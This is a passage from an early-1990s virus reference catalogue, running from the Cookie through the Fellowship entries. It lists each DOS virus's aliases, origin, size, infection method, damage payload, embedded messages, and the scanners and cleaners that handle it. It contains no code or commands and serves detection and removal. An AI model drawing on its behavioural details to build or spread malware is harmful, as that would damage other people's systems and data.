       action virus which infects .COM and .EXE files, including COMMAND.COM.

       When a program infected with the Cookie Virus is executed, the virus
       will search the current drive and directory for a file to infect.  The
       virus first looks for a .COM file to infect.  If an uninfected .COM
       file is located, it will become infected.  If an uninfected .COM file
       is not found, the virus will then look for an uninfected .EXE file to
       infect.  In other words, all the .COM files in the directory will become
       infected before any of the .EXE files in that directory are infected.
       Infected files will show a file length increase of between 2,232 and
       2,251 bytes in length.  The virus will be located at the end of the
       infected file.  Infected files will not have their date and time in
       the disk directory altered.

       Systems infected with the Cookie Virus may experience system hangs
       when some infected programs are executed.  In some cases, the
       infected program will stop functioning properly after a number of
       executions, though this does not always occur.

       This virus has also been reported to possibly display the message
       "I want a COOKIE!", though the sample received doesn't exhibit this
       behavior.

       Also see: SysLock


 Virus Name:  Dark Avenger
 Aliases:     Black Avenger, Eddie, Diana
 V Status:    Common
 Discovery:   September, 1989
 Symptoms:    TSR; .COM, .EXE, .SYS file growth; File/Disk Corruption
 Origin:      Bulgaria
 Isolated:    Davis, California, USA
 Eff Length:  1,800 bytes
 Type Code:   PRsAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V36+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  CleanUp, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+
 General Comments:
       Dark Avenger was first isolated in the United States at the University
       of California at Davis.  It infects .COM, .EXE, and overlay files,
       including COMMAND.COM.  The virus will install itself into system
       memory, becoming resident, and is extremely prolific at infecting
       any executable files that are openned for any reason.  This includes
       using the DOS COPY and XCOPY commands to copy uninfected files, both
       the source and the target files will end up being infected.  Infected
       files will have their lengths increased by 1,800 bytes.

       The Dark Avenger Virus does perform malicious damage.  The virus
       maintains a counter in the disk's boot sector.  After each sixteenth
       file is infected, the virus will randomly overwrite a sector on the
       disk with a copy of the disk's boot sector.  If the randomly
       selected sector is a portion of a program or data file, the program
       or data file will be corrupted.  Programs and data files which have
       been corrupted by a sector being overwritten are permanently
       damaged and cannot be repaired since the original sector is lost.

       If you are infected with Dark Avenger, shutdown your computer
       and reboot from a Write Protected boot diskette for the system,
       then carefully use a disinfector, following all instructions.
       Be sure to re-scan the system for infection once you have finished
       disinfecting it.

       The Dark Avenger virus contains the words: "The Dark Avenger,
       copyright 1988, 1989", as well as the message: "This program
       was written in the city of Sofia.  Eddie lives.... Somewhere in
       Time!".

       This virus bears no resemblance or similarity to the Jerusalem
       viruses, even though they are similar in size.

       Known variant(s) of Dark Avenger are:
       Dark Avenger-B : Very similar to the Dark Avenger virus, the major
               difference is that .COM files will be reinfected, adding
               1,800 bytes to the file length with each infection.  This
               variant also becomes memory resident in high system memory
               instead of being a low system memory TSR.  Text strings
               found in the virus's code include:
               "Eddie lives...somewhere in time!"
               "Diana P."
               "This program was written in the city of Sofia"
               "(C)1988-1989 Dark Avenger"

       Also see: V2000, V1024, V651


 Virus Name:  Datacrime
 Aliases:     1168, Columbus Day
 V Status:    Extinct
 Discovery:   April, 1989
 Symptoms:    .COM file growth, floppy disk access; formats 
              hard disk, message any day from Oct 13 to Dec 31.
 Origin:      Holland
 Eff Length:  1,168 bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  AntiCrim, Scan/D/X, Pro-Scan 1.4+, VirexPC, F-Prot,
              VirHunt 2.0+
 General Comments:
       The Datacrime virus is a parasitic virus, and is also known as
       the 1168 virus.  The Datacrime virus is a non-resident
       virus, infecting .COM files.  The virus was originally
       discovered in Europe shortly after its release in March, 1989.

       The virus will attach itself to the end of a .COM file, increasing
       the file's length by 1168 bytes.  The first 5 bytes of the host
       program are stored off in the virus's code and then replaced by
       a branch instruction so that the virus code will be executed
       before the host program.  In order to propagate, the virus
       searches thru directories for .COM files, other than
       COMMAND.COM and attaches to any found .COM files (except for
       where the 7th letter is a D).  Hard drive partitions are
       searched before the floppy drives are checked.  The virus will
       continue to propagate until the date is after October 12 of any
       year, then when it is executed it will display a message.  The
       decrypted message is something like:

                 "DATACRIME VIRUS"
                 "RELEASED: 1 MARCH 1989".

       Note: only this ASCII message is encrypted in this version.

       A low-level format of the hard disk is then done.  

       Errors in the code will make .COM file infection appear random
       and will often make the system crash following infection.

       Unlike the other variants of Datacrime, the original Datacrime
       virus does not replicate, or infect files, until after April 1
       of any year.

       Lastly, if the computer system is using an RLL, SCSI, or PC/AT
       type hard disk controller, all variants of the Datacrime virus
       are not able to successfully format the hard disk, according
       to Jan Terpstra of the Netherlands.

       Also see: Datacrime II, Datacrime IIB, Datacrime-B


 Virus Name:  Datacrime II
 Aliases:     1514, Columbus Day
 V Status:    Endangered
 Discovered:  September, 1989
 Symptoms:    .EXE & .COM file growth, formats disk
 Origin:      Netherlands
 Eff Length:  1,514 bytes
 Type Code:   PNAK - Non-Resident Encrypting .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  AntiCrim, Scan/D/X, Pro-Scan 1.4+, VirexPC, F-Prot,
              VirHunt 2.0+
 General Comments:
       The Datacrime II virus is a variant of the Datacrime virus, the
       major characteristic changes are that the effective length of
       the virus is 1,514 bytes, and that it can now infect both
       .COM and .EXE files, including COMMAND.COM.  There is also an
       encryption mechanism in the Datacrime II virus.

       The Datacrime II virus will not format disks on Mondays.

       Also see: Datacrime, Datacrime IIB, Datacrime-B


 Virus Name:  Datacrime IIB
 Aliases:     1917, Columbus Day
 V Status:    Endangered
 Discovered:  November, 1989
 Symptoms:    .EXE & .COM growth, formats disk, floppy disk access.
 Origin:      Netherlands      
 Eff Length:  1,917 bytes
 Type Code:   PNAK - Non-Resident Encrypting .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              VirHunt 2.0+
 Removal Instructions:  AntiCrim, Scan/D/X, F-Prot, VirexPC, VirHunt 2.0
 General Comments:
       The Datacrime IIB virus is a variant of the Datacrime II virus,
       and was isolated by Jan Terpstra of the Netherlands in
       November, 1989.  This virus, as with Datacrime II, infects
       generic .COM & .EXE files, including COMMAND.COM, adding 1,917
       bytes to the file length.  The virus differs from Datacrime II
       in that the encryption method used by the virus to avoid
       detection has been changed.

       The Datacrime IIB virus will not format disks on Mondays.

       Also see: Datacrime, Datacrime II, Datacrime-B


 Virus Name:  Datacrime-B
 Aliases:     1280, Columbus Day
 V Status:    Extinct
 Discovered:  April, 1989
 Symptoms:    .EXE file growth, formats MFM/RLL hard drives, odd
              floppy disk access.
 Origin:      Netherlands
 Eff Length:  1,280 bytes
 Type Code:   PNE - Parasitic Non-Resident Generic .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: AntiCrim, Scan/D/X, VirexPC, Pro-Scan 1.4+, F-Prot,
              VirHunt 2.0
 General Comments:
       The Datacrime-B virus is a variant of the Datacrime virus, the
       differences being that the effective length of the virus is
       1,280 bytes, and instead of infecting .COM files, .EXE files
       are infected.

       Also see: Datacrime, Datacrime II, Datacrime II-B


 Virus Name:  DataLock
 Aliases:     DataLock 1.00, V920
 V Status:    Common
 Discovered:  November, 1990
 Symptoms:    .EXE & COMMAND.COM file growth; decrease in system and available
              memory; file date/time changes
 Origin:      USA
 Eff Length:  920 bytes
 Type Code:   PRtEK - Parasitic Resident .EXE and COMMAND.COM Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V71+, or Delete infected files
 General Comments:
       The DataLock, or V920, Virus was isolated in many locations in the
       United States starting on November 1, 1990.  This virus is a generic
       memory resident infector of .EXE files, but it will also infect
       COMMAND.COM if it is executed.

       The first time a program infected with the DataLock Virus is executed,
       the virus will install itself memory resident at the top of free memory,
       but below the 640K DOS boundary.  Infected systems will find that total
       system memory and available free memory will be 2,048 bytes less than
       is expected.  Interrupt 21 will be hooked by the virus.

       After the virus is memory resident, any .EXE file that is executed will
       be infected by the virus.  Infected files will have a file length
       increase of 920 bytes, and their date/time indicated in the disk
       directory will have been changed to the system date and time when the
       infection occurred.  The virus is located at the end of infected files.
       The following text, indicating the virus's name, can be found at the
       end of all infected files:

               "DataLock version 1.00"

       It is unknown if DataLock carries an activation date, or its potential
       for damage.


 Virus Name:  dBASE
 Aliases:     DBF Virus
 V Status:    Extinct
 Discovered:  September, 1988
 Symptoms:    .COM & .OVL file growth, corrupt .DBF files, TSR, FAT and root
              directory overwritten
 Origin:      New York, USA
 Eff Length:  1,864 bytes
 Type Code:   PRC - Parasitic Resident .COM and Overlay Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+
 General Comments:
       The dBASE virus was discovered by Ross Greenberg of New York.
       This virus infects .COM & .OVL files, and will corrupt data in
       .DBF files by randomly transposing bytes in any open .DBF file.
       It keeps track of which files and bytes were transposed in a
       hidden file (BUG.DAT) in the same directory as the .DBF file(s).
       The virus restores these bytes if the file is read, so it
       appears that nothing is wrong.  Once the BUG.DAT file is 90
       days old or more, the virus will overwrite the FAT and root
       directory on the disk.

       After this virus has been detected, if you remove the infected
       dBASE program and replace it with a clean copy, your DBF files
       that were openned during the period that you were infected
       will be useless since they are garbled on the disk even
       though they would be displayed as expected by the infected
       dBASE program.


 Virus Name:  Den Zuk
 Aliases:     Search, Venezuelan
 V Status:    Common
 Discovered:  September, 1988
 Symptoms:    Message, floppy format, TSR, BSC 
 Origin:      Indonesia
 Eff Length:  N/A
 Type Code:   RtF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: MDisk, CleanUp, F-Prot, Pro-Scan 1.4+,
              or DOS SYS command
 General Comments:
       The Den Zuk virus is a memory-resident, boot sector infector of
       360K 5 1/4" diskettes.  The virus can infect any diskette
       in a floppy drive that is accessed, even if the diskette is
       not bootable.  If an attempt is made to boot the system with an
       infected non-system disk, Den Zuk will install itself into
       memory even though the boot failed.  After the system is booted
       with an infected diskette, a purple "DEN ZUK" graphic will appear
       after a CTL-ALT-DEL is performed if the system has a CGA, EGA, or
       VGA monitor.  While the original Den Zuk virus did not cause any
       damage to the system, some variants maintain a counter of how
       many times the system has been rebooted, and after the counter
       reaches its limit, the floppy in the disk drive is reformatted.
       The counter in these variants of the virus is usually in the
       range of 5 to 10.

       The following text strings can be found in the viral code on
       diskettes which have been infected with the Den Zuk virus:

                 "Welcome to the
                     C l u b
                  --The HackerS--
                      Hackin'
                   All The Time

                   The HackerS"

       The diskette volume label of infected diskettes may be changed
       to Y.C.1.E.R.P., though this change only occurs if the Den Zuk
       virus removed a Pakistani Brain infection before infecting the
       diskette with Den Zuk.  The Den Zuk virus will also remove
       an Ohio virus infection before infecting the diskette with
       Den Zuk.

       The Den Zuk virus is thought to be written by the same person
       or persons as the Ohio virus.  The "Y.C.1.E.R.P." string is
       found in the Ohio virus, and the viral code is similar in
       many respects.

       Also see: Ohio


 Virus Name:  Destructor V4.00
 Aliases:     Destructor
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; decrease in system and available free memory
 Origin:      Bulgaria
 Eff Length:  1,150 Bytes
 Type Code:   PRtAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Destructor V4.00 Virus was received in December, 1990.  This virus
       is from Bulgaria, and is a memory resident infector of .COM and .EXE
       files, including COMMAND.COM.

       When the first program infected with the Destructor V4.00 Virus is
       executed, the virus will install itself memory resident at the top of
       system memory but below the 640K DOS boundary.  Interrupt 12's return
       is moved.  Total system memory and available free memory will be
       1,216 bytes less than what is expected on the infected system.  At this
       time, the virus will also infect COMMAND.COM if it is not already
       infected.

       Once Destructor V4.00 is memory resident, it will infect programs as
       they are openned or executed.
       Infected .COM programs will have increased in size by 1,150 bytes.
       .EXE programs will have increased in size by 1,154 to 1,162 bytes.
       In both cases, the virus will be located at the end of the infected
       file.  This virus does not alter the file's date/time in the disk
       directory, and it also makes no attempt to hide the file length increase
       on infected programs.

       The following text string can be found in files infected with this
       virus:

               "DESTRUCTOR  V4.00  (c) 1990 by ATA

       It is unknown what Destructor V4.00 does, if anything, besides
       replicate.


 Virus Name:  Devil's Dance
 Aliases:     Mexican
 V Status:    Rare
 Discovered:  December, 1989
 Symptoms:    Message, .COM growth, FAT corruption, TSR 
 Origin:      Mexico
 Eff Length:  941 Bytes
 Type Code:   PRCT - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V52+, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, Pro-Scan 1.4+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Devil's Dance virus was first isolated in December, 1989,
       by Mao Fragoso of Mexico City.  The Devil's Dance virus
       increases the size of infected .COM files by 941 bytes, and
       will infect a file multiple times until the file becomes too
       large to fit in available system memory.

       Once an infected program has been run, any subsequent warm-
       reboot (CTL-ALT-DEL) will result in the following message
       being displayed:

       "DID YOU EVER DANCE WITH THE DEVIL IN THE WEAK MOONLIGHT?
                            PRAY FOR YOUR DISKS!!
                                The Joker"

       The Devil's Dance virus is destructive.  After the first 2,000
       keystrokes, the virus starts changing the colors of any text
       displayed on the system monitor.  After the first 5,000
       keystrokes, the virus erases the first copy of the FAT.  At
       this point, when the system is rebooted, it will display the
       message above and again destroy the first copy of the FAT, then
       allow the boot to proceed.


 Virus Name:  Dir Virus
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; TSR; Sluggishness of DIR commands;
              File allocation errors
 Origin:      USSR
 Eff Length:  691 Bytes
 Type Code:   PRsCK - Parasitic Resident .COM  Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Dir Virus was submitted in January, 1991.  It originated in the
       USSR.  The Dir Virus is a memory resident infector of .COM programs,
       including COMMAND.COM.

       The first time a program infected with the Dir Virus is executed, the
       virus will install itself memory resident as a low system memory TSR
       of 1,008 bytes.  Interrupt 21 will be hooked by the virus.  If
       COMMAND.COM is not already infected, it will become infected at this
       time.

       After the Dir Virus is memory resident, it will only infect .COM
       programs when a DOS Dir command is performed.  It does not infect
       programs on execution, or when .COM files are openned.  When a Dir
       command is performed, the first uninfected .COM program that is found
       in the directory will become infected.  When the virus infects a .COM
       file, there will be a pause in the output of the dir command while the
       program is being infected, then the output will continue.

       Infected programs will increase in size by 691 bytes, though the file
       length increase cannot be seen when a directory command is performed if
       the virus is memory resident.  The virus will be located at the end of
       infected programs.  Infected programs will not have their date and time
       altered by the virus.

       Systems infected with the Dir Virus will receive file allocation errors
       when the DOS ChkDsk program is executed on a drive containing infected
       programs.  If the virus is not memory resident, these errors will not
       be found.  Execution of the DOS ChkDsk program with the /F option when
       the virus is memory resident will result in corruption of the infected
       programs.

       This virus does not appear to contain any activation mechanism.


 Virus Name:  Discom
 Aliases:
 V Status:    New
 Discovered:  November, 1990
 Symptoms:    TSR; .COM & .EXE growth
 Origin:      Unknown
 Eff Length:  2,053 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The Discom Virus was submitted in November, 1990.  The location where
       the sample was isolated is unknown.  Discom is a memory resident
       infector of .COM and .EXE files, and will not infect COMMAND.COM.

       This virus is based on the Jerusalem Virus, and also contains some code
       from the Sunday Virus.  As such, some anti-viral utilities may identify
       files infected with this virus as containing both Jerusalem and Sunday.
       This virus does not exhibit symptoms or the activation of either the
       Jerusalem or Sunday viruses.

       The first time a program infected with the Discom Virus is executed,
       the virus will install itself memory resident as a 2,304 byte low
       system memory TSR.  Interrupts 08 and 21 will be hooked by the virus.

       Once memory resident, the virus will infect .COM and .EXE files when
       they are executed.  Infected .COM files will increase in length by
       2,053 bytes and have the virus located at the beginning of the infected
       file.  Infected .EXE files will increase in length by 2,059 to 2,068
       bytes with the virus being located at the end of the file.  All infected
       files will end with the following hex character string: 11121704D0.

       Unlike many Jerusalem Variants, this virus does not exhibit a system
       slowdown after being memory resident for 30 minutes, and no "black
       window" appears.


 Virus Name:  Disk Killer
 Aliases:     Computer Ogre, Disk Ogre, Ogre
 V Status:    Common
 Discovered:  April, 1989
 Symptoms:    Bad blocks, message, BSC, TSR, encryption of disk
 Origin:      Taiwan
 Isolated:    Milpitas, California, USA
 Eff Length:  N/A
 Type Code:   BRtT - Resident Boot Sector Infector
 Detection Method:  ViruScan V39+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, Pro-Scan 1.4+, F-Prot, or
              DOS COPY & SYS
 General Comments:
       The Disk Killer virus is a boot sector infector that spreads by
       writing copies of itself to 3 blocks on either a floppy or
       hard disk.  The virus does not care if these blocks are in use
       by another program or are part of a file.  These blocks will then
       be marked as bad in the FAT so that they cannot be overwritten.
       The boot sector is patched so that when the system is booted, the
       virus code will be executed and it can attempt to infect any new
       disks exposed to the system.

       The virus keeps track of the elapsed disk usage time since initial
       infection, and does no harm until it has reached a predetermined
       limit.  The predetermined limit is approximately 48 hours.  (On
       most systems, Disk Killer will reach its limit within 1 - 6
       weeks of its initial hard disk infection.)

       When the limit is reached or exceeded and the system is rebooted,
       a message is displayed identifying COMPUTER OGRE and a date of
       April 1.  It then says to leave alone and proceeds to encrypt the
       disk by alternately XORing sectors with 0AAAAh and 05555h,
       effectively destroying the information on the disk.  The only recourse
       after Disk Killer has activated and encrypted the entire disk is to
       reformat.

       The message text that is displayed upon activation, and can be found
       in the viral code is:

         "Disk Killer -- Version 1.00 by COMPUTER OGRE 04/01/89

                                Warning!!

          Don't turn off the power or remove the diskette while Disk Killer is
          Processing!

                                PROCESSING

          Now you can turn off the power.  I wish you Luck!"

       It is important to note that when the message is displayed, if the
       system is turned off immediately it may be possible to salvage
       some files on the disk using various utility programs as this
       virus first destroys the boot, FAT, and directory blocks.

       Disk Killer can be removed by using McAfee Associate's MDisk or
       CleanUp utility, or the DOS SYS command, to overwrite the boot
       sector on hard disks or bootable floppies.  On non-system floppies,
       files can be copied to non-infected floppies, followed by reformatting
       the infected floppies.  Be sure to reboot the system from a
       write protected master diskette before attempting to remove the
       virus first or you will be reinfected by the virus in memory.

       Note: Disk Killer may have damaged one or more files on the disk
       when it wrote a portion of its viral code to 3 blocks on the disk.
       Once the boot sector has been disinfected as indicated above, these
       corrupted files cannot reinfect the system, however they should be
       replaced with backup copies since the 3 blocks were overwritten.

       Note: Do not use the DOS DiskCopy program to backup infected
       diskettes as the new backup diskettes will contain the virus
       as well.


 Virus Name:  Do-Nothing Virus
 Aliases:     The Stupid Virus
 V Status:    Extinct
 Discovered:  October, 1989
 Symptoms:    .COM file growth, TSR (see text)
 Origin:      Israel      
 Eff Length:  608 Bytes
 Type Code:   PRfC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, or F-Prot
 General Comments:
       This virus was first reported by Yuval Tal of Israel in
       October, 1989.  The virus will infect .COM files, but only the
       first one in the current directory, whether it was previously
       infected or not.  The Do-Nothing virus is also memory
       resident, always installing itself to memory address
       9800:100h, and can only infect systems with 640K of memory.
       The virus does not protect this area of memory in any way,
       and other programs which use this area will overwrite it in
       memory, removing the program from being memory resident.

       The Do-Nothing virus does no apparent damage, nor does it
       affect operation of the system in any observable way, thus
       its name.

       Also see: Saddam


 Virus Name:  Dot Killer
 Aliases:     944, Point Killer
 V Status:    Rare
 Discovered:  October, 1990
 Symptoms:    .COM growth; removal of all dots (.) from display
 Origin:      Koszalin, Poland
 Eff Length:  944
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V72+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Dot Killer Virus was isolated in Koszalin, Poland in October, 1990.
       It is a non-resident infector of .COM files, including COMMAND.COM.

       When a program infected with the Dot Killer Virus is executed, the
       virus will infect one other .COM file in the current directory.
       Infected .COM files will increase in length by 944 bytes.  The virus
       will be located at the end of infected files.

       While the Dot Killer Virus contains code to attempt to avoid infecting
       the program pointed to by the COMSPEC environmental parameter, this
       logic contains a bug and does not function properly.  If COMMAND.COM,
       or the program pointed to by COMSPEC, is located in the current
       directory it will become infected just like any other .COM program.

       When the Dot Killer Virus activates, it will remove all dots (.) from
       the system display.


 Virus Name:  EDV
 Aliases:     Cursy, Stealth Virus
 V Status:    Rare
 Discovered:  1988
 Symptoms:    BSC; partition table corruption; unusual system crashes
 Origin:      France
 Eff Length:  N/A
 Type Code:   BRX - Resident Boot Sector/Partition Table Infector
 Detection Method:  ViruScan V58+, IBM Scan, Pro-Scan 1.4+, VirHunt 2.0+
 Removal Instructions:  MDisk/P, CleanUp V67+, or Pro-Scan 1.4+
 General Comments:
       The EDV, or Cursy, Virus was first discovered in Le Havre, France in
       1988 by Jean-Luc Nail.  At that time, it was named the Cursy Virus.
       Later, in January 1990, it was isolated separately and named the
       EDV virus.  This virus is a memory resident infector of floppy
       diskette boot sectors and hard disk partition tables.

       When a system is booted from a diskette infected with the EDV virus,
       the virus will install itself memory resident at the top of high
       system memory.  The value returned by interrupt 12 will be decreased.

       Once the virus is memory resident, and disk accessed by the system
       will become infected.  When the virus infects a diskette, it moves
       the original boot sector to side 1, track 39, sector 8.  After
       moving the original boot sector, it then copies the virus's code
       to absolute sector 0, the boot sector of the diskette.

       EDV will also infect hard disk drives when they are accessed.  In the
       case of hard disks, the virus will move absolute sector 0 (the
       partition table) to side 1, track 39, sector 8 as though it were a
       360K 5.25" floppy diskette.  After moving the partition table, it will
       then overwrite the partition table with the viral code.

       Once the virus has infected six disks with the virus in memory, the
       EDV virus will activate.  Upon activation, the virus access the
       keyboard interrupt to disable the keyboard and then will overwrite
       the first 3 tracks of each disk on the system, starting with the
       hard disks.  After overwriting the disks, it will then display the
       following message:

               "That rings a bell, no? From Cursy"

       Upon activation, the user must power off the machine and reboot from
       a system diskette in order to regain any control over the machine.

       The following identification string appears at the very end of the
       boot sector on infected floppy disks and the partition table of
       infected hard drives, though it cannot be seen if the virus is
       in memory:

            "MSDOS Vers. E.D.V."

       Jean-Luc Nail has indicated that the EDV or Cursy virus is quiet
       common in the Le Havre area of France, although it is rare outside
       of France.


 Virus Name:  Eight Tunes
 Aliases:     1971
 V Status:    Rare
 Discovered:  April, 1990
 Symptoms:    file growth, music, decrease in available memory
 Origin:      West Germany
 Eff Length:  1,971 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V62+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, VirHunt 2.0+, or delete infected files
 General Comments:
       The Eight Tunes, or 1971, Virus was originally isolated in April
       1990 by Fridrik Skulason of Iceland.  This virus is a memory resident
       generic file infector of .COM, .EXE, and overlay files.  The virus will
       not infect COMMAND.COM, or .COM files which are smaller than 8K.
       After the virus is memory resident, programs are infected as they
       are executed.  Infected files will increase in length by between
       1,971 - 1,985 bytes.

       Available memory will decrease by 1,984 bytes when the virus is
       present.

       This virus does not cause system damage, however it is disruptive.
       When the virus is memory resident, it will play 8 German folk songs
       at random intervals thirty minutes after the virus becomes memory
       resident.


 Virus Name:  Evil
 Aliases:     P1, V1701New
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    .COM growth, system reboots, CHKDSK program failure,
              COMMAND.COM header change
 Origin:      Bulgaria
 Eff Length:  1,701 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method: ViruScan V66+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Evil Virus is of Bulgarian origin, and was submitted to
       the author of this document in July, 1990 by Vesselin Bontchev.
       This virus is one of a family of three (3) viruses which may be
       referred to as the P1 or Phoenix Family.  Each of these viruses is
       being documented separately due to their varying characteristics.
       The Evil virus is a memory resident, generic infector of .COM
       files, and will infect COMMAND.COM.  It is the most advanced of the
       three viruses in the Phoenix Family.

       The Evil, or V1701New, Virus is a later version of the PhoenixD virus.

       The first time a program infected with the Evil virus is executed,
       the virus will install itself memory resident in free high memory,
       reserving 8,192 bytes.  Interrupt 2A will be hooked by the virus.
       System total memory and free memory will decrease by 8,192 bytes.
       Evil will then check to see if the current drive's root directory
       contains a copy of COMMAND.COM.  If a copy of COMMAND.COM is found,
       it will be infected by Evil by overwriting part of the binary zero
       portion of the program, and changing the program's header information.
       COMMAND.COM will not change in file length.  The virus will then
       similarly infect COMMAND.COM residing in the C: drive root directory.

       After becoming memory resident, the virus will attempt to infect any
       .COM file executed.  Evil is a better replicator than either the
       original Phoenix Virus or PhoenixD, and was successful in infecting
       .COM files in all cases on the author's system.  Infected files will
       increase in size by 1,701 bytes.

       Evil is not able to recognize when it has previously infected a
       file, so it may reinfect .COM files several times.  Each infection will
       result in another 1,701 bytes of viral code being appended to the
       file.

       Like PhoenixD, Evil will infect files when they are openned for
       any reason in addition to when they are executed.  The simple act of
       copying a .COM file will result in both the source and target .COM
       files being infected.   

       Systems infected with the Evil virus will experience problems with
       executing CHKDSK.COM.  Attempts to execute this program with Evil
       memory resident will result in a warm reboot of the system occurring.
       The system, however, will not perform either a RAM memory check or
       request Date and Time if an autoexec.bat file is not present.

       This virus is not related to the Cascade (1701/1704) virus.

       The Evil Virus employs a complex encryption mechanism, and virus
       scanners which are only able to look for simple hex strings will not
       be able to detect it.  There is no simple hex string in this virus
       that is common to all infected samples.

       Known variant(s) of Evil are:
       Evil-B : This is a earlier version of Evil, and is a rather
                poor replicator.  It also has not to viable as infected
                programs will hang when they are executed, with the
                exception of the Runme.Exe file which the author
                received.  The Runme.Exe file was probably the original
                release file distributed by the virus's author.
                (Originally listed in VSUM9008 as V1701New-B)

       Also see: Phoenix, PhoenixD


 Virus Name:  F-Word Virus
 Aliases:     Fuck You
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM growth; decrease in system and available free memory;
              file date/time changes
 Origin:      USSR
 Eff Length:  417 Bytes
 Type Code:   PRtCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The F-Word, or Fuck You, Virus was submitted in December, 1990 and
       is from the USSR.  This virus is a memory resident infector of COM
       files, including COMMAND.COM.

       The first time a program infected with the F-Word Virus is executed
       the virus will install itself memory resident at the top of system
       memory but below the 640K DOS boundary.  Interrupt 12's return will
       be moved.  Total system memory and available free memory will decrease
       by 1,024 bytes.  Interrupts 08 and 21 will be hooked by the virus.

       After F-Word is memory resident, it will infect COM files over
       approximately 2K in length when they are executed.  Infected files will
       have a length increase of 417 bytes with the virus being located at the
       end of the program.  The file's date and time in the directory will also
       have been changed to the system date and time when infection occurred.

       Attempts to executed the DOS Edlin program will result in a
       "Invalid drive of file name" message being displayed, and the program
       terminated.

       The text string "Fuck You!" can be found in all infected files.


 Virus Name:  Father Christmas
 Aliases:     Choinka
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    .COM growth; lost cluster; cross-linking of files;
              graphic and message displayed on activation
 Origin:      Poland
 Eff Length:  1,881 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Father Christmas, or Choinka, Virus was discovered in Poland in
       November, 1990.  This virus is based on the Vienna Virus, and is a
       non-resident infector of .COM files, including COMMAND.COM.

       When a program infected with the Father Christmas Virus is executed,
       the virus will infect one other .COM file in the current directory.
       If no uninfected .COM files exist in the current directory, the virus
       will follow the system path to find an uninfected program.  Infected
       files will increase in length by 1,881 bytes with the virus being
       located at the end of the infected program.

       Systems infected with the Father Christmas Virus may notice crosslinking
       of files and lost clusters.

       During the period from December 19 - December 31 of any year, this
       virus will activate.  On these dates, when infected programs are
       executed a christmas trees graphic is displayed on the system monitor
       with the following message:

                    Merry Christmas
                           &
                   a  Happy New Year
               for all my lovely friends
                         from
                    FATHER CHRISTMAS

       If the graphic is displayed, the user must strike a key in order to
       have the program being executed finish running.


 Virus Name:  Fellowship
 Aliases:     1022
 V Status:    Rare
 Discovered:  July, 1990
 Isolated:    Australia
 Symptoms:    TSR, .COM & .EXE file growth
 Origin:      Malaysia
 Eff Length:  1,022 Bytes
 Type Code:   PRsE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan V66+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files
 General Comments:
       The Fellowship or 1022 Virus was isolated in Australia in July 1990.
       Fellowship is a memory resident generic infector of .EXE files.  It
       does not infect .COM or overlay files.

       The first time a program infected with the Fellowship Virus is
       executed, the virus will install itself memory resident as a 2,048
       byte TSR in low system memory.  Available free memory will be decreased
       by a corresponding 2,048 bytes.  Interrupt 21 will also now be
       controlled by the virus.

       After the virus is memory resident, the virus will infect .EXE files
       when they are executed.  Infected .EXE files will increase in size
       by between 1,019 and 1,027 bytes.  The virus's code will be located
       at the end of infected files.

       Infected files will contain the following text strings very close to
       the end of the file:

             "This message is dedicated to
              all fellow PC users on Earth
